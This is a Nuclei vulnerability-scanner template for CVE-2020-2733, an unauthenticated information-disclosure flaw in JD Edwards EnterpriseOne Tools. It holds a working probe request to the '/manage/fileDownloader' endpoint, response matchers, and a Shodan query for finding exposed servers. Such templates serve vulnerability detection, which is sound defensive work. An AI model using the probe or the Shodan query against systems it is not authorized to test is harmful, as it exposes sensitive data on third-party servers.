nuclei-templates/cves/2020/CVE-2020-2733.yaml

44 lines
1.3 KiB
YAML

id: CVE-2020-2733
info:
name: JD Edwards EnterpriseOne Tools 9.2 - Information Disclosure
author: DhiyaneshDk,pussycat0x
severity: critical
description: |
JD Edwards EnterpriseOne Tools 9.2 is susceptible to information disclosure via the Monitoring and Diagnostics component. An attacker with network access via HTTP can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
reference:
- https://redrays.io/cve-2020-2733-jd-edwards/
- https://www.oracle.com/security-alerts/cpuapr2020.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-2733
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-2733
metadata:
shodan-query: port:8999 product:"Oracle WebLogic Server"
verified: "true"
tags: cve,cve2020,oracle,weblogic,disclosure,exposure
requests:
- method: GET
path:
- '{{BaseURL}}/manage/fileDownloader?sec=1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'ACHCJK'
- type: word
part: header
words:
- "text/plain"
- type: status
status:
- 200
# Enhanced by md on 2023/02/01